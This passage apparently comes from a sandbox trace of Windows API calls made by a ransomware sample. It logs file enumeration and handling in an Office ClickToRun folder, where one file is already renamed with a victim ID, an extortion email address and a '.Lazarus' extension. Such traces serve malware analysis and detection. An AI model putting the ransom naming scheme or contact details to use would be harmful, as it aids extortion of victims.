[0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0095.675] CloseHandle (hObject=0x33c) returned 1 [0095.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0095.675] AreFileApisANSI () returned 1 [0095.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0095.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.676] GetFileType (hFile=0x33c) returned 0x1 [0095.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0095.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.676] GetLastError () returned 0xb7 [0095.676] SetLastError (dwErrCode=0xb7) [0095.676] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0095.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0095.677] CloseHandle (hObject=0x33c) returned 1 [0095.677] AreFileApisANSI () returned 1 [0095.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0095.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.678] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0095.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.679] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9133507b, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80, dwReserved0=0x1, dwReserved1=0x0, cFileName="IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="INTEGR~1.LAZ")) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cc38 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0095.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0095.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x817a8 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x4e568 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0095.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0095.680] AreFileApisANSI () returned 1 [0095.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 141 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0095.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0095.681] AreFileApisANSI () returned 1 [0095.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0095.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11a) returned 0x5e870 [0095.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=141 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 141 [0095.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.681] GetFileType (hFile=0x33c) returned 0x1 [0095.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0095.681] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0095.681] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0095.681] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0095.682] CloseHandle (hObject=0x33c) returned 1 [0095.682] AreFileApisANSI () returned 1 [0095.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0095.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11a) returned 0x5e870 [0095.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=141 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 141 [0095.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.682] GetFileType (hFile=0x33c) returned 0x1 [0095.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0095.682] CloseHandle (hObject=0x33c) returned 1 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0095.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x817a8 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0095.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81918 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x817a8 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0095.684] AreFileApisANSI () returned 1 [0095.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0095.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11a) returned 0x5e870 [0095.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=141 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 141 [0095.684] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9133507b, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80)) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0095.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0095.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.684] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="MavInject32.exe", cAlternateFileName="MAVINJ~1.EXE")) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 